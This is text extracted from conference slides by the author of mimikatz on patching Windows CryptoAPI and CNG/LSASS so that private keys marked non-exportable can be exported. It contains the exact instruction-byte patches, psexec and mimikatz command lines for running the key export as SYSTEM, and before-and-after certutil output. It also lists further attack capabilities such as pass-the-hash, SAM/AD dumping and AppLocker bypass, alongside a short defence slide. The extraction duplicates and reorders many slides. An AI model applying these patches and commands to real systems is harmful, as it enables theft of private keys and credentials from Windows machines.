07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
